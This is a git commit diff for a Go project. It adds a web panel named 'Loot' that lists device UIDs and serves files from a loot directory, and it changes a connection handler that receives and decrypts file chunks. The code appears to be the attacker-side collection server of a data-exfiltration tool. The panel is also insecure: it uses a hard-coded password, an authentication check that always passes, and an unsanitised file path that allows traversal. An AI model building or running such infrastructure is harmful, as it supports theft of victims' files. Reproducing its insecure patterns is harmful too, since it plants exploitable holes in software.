Loothandler

This commit is contained in:
Joren Schipman 2024-05-04 01:30:04 +02:00
parent 04db12a77f
commit 6d8d316bb1
Signed by untrusted user who does not match committer: Joren
GPG Key ID: 280E33DFBC0F1B55
6 changed files with 156 additions and 2 deletions

18
files.html Normal file
View File

@ -0,0 +1,18 @@
<!-- files.html -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Files</title>
</head>
<body>
<h2>Files</h2>
<ul>
{{range .Files}}
<li>{{.}}</li>
{{end}}
</ul>
</body>
</html>

2
go.sum Normal file
View File

@ -0,0 +1,2 @@
github.com/liamg/magic v0.0.1 h1:Ru22ElY+sCh6RvRTWjQzKKCxsEco8hE0co8n1qe7TBM=
github.com/liamg/magic v0.0.1/go.mod h1:yQkOmZZI52EA+SQ2xyHpVw8fNvTBruF873Y+Vt6S+fk=

20
login.html Normal file
View File

@ -0,0 +1,20 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
</head>
<body>
<h2>Login</h2>
<form action="/" method="post">
<label for="password">Password:</label><br>
<input type="password" id="password" name="password"><br>
<input type="submit" value="Submit">
</form>
{{if .}}
<p style="color: red;">{{.}}</p>
{{end}}
</body>
</html>

17
loot.html Normal file
View File

@ -0,0 +1,17 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Loot</title>
</head>
<body>
<h2>Loot</h2>
<ul>
{{range .UIDs}}
<li><a href="/files/{{.}}">{{.}}</a></li>
{{end}}
</ul>
</body>
</html>

97
loothandler.go Normal file
View File

@ -0,0 +1,97 @@
package main
import (
"html/template"
"io/ioutil"
"log"
"net/http"
"path/filepath"
"strings"
)
var (
password = "hardcodedpassword"
lootPath = "Loot"
)
type PageData struct {
UIDs []string
Files []string
}
func main() {
http.HandleFunc("/", loginHandler)
http.HandleFunc("/loot", lootHandler)
http.HandleFunc("/logout", logoutHandler)
http.HandleFunc("/files/", fileHandler)
log.Fatal(http.ListenAndServe(":8080", nil))
}
func loginHandler(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
renderTemplate(w, "login.html", nil)
return
}
if r.FormValue("password") == password {
http.Redirect(w, r, "/loot", http.StatusSeeOther)
return
}
renderTemplate(w, "login.html", "Incorrect password")
}
func lootHandler(w http.ResponseWriter, r *http.Request) {
if !isAuthenticated(r) {
http.Redirect(w, r, "/", http.StatusSeeOther)
return
}
uids, err := getDeviceUIDs()
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
data := PageData{UIDs: uids}
renderTemplate(w, "loot.html", data)
}
func fileHandler(w http.ResponseWriter, r *http.Request) {
requestedPath := strings.TrimPrefix(r.URL.Path, "/files/")
filePath := filepath.Join(lootPath, requestedPath)
http.ServeFile(w, r, filePath)
}
func logoutHandler(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, "/", http.StatusSeeOther)
}
func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
t, err := template.ParseFiles(tmpl)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
t.Execute(w, data)
}
func isAuthenticated(r *http.Request) bool {
return true
}
func getDeviceUIDs() ([]string, error) {
var uids []string
files, err := ioutil.ReadDir(lootPath)
if err != nil {
return nil, err
}
for _, file := range files {
if file.IsDir() {
uids = append(uids, file.Name())
}
}
return uids, nil
}

View File

@ -117,11 +117,11 @@ func handleConnection(conn net.Conn, privateKey *rsa.PrivateKey) {
chunks = append(chunks, chunk)
conn.Write([]byte("Received and decrypted chunk\n"))
conn.Write([]byte("C\n"))
}
go decryptAndHandle(chunks, key, iv, uid)
conn.Write([]byte("Received and decrypted\n"))
conn.Write([]byte("D\n"))
moreFiles, err := bufio.NewReader(conn).ReadString('\n')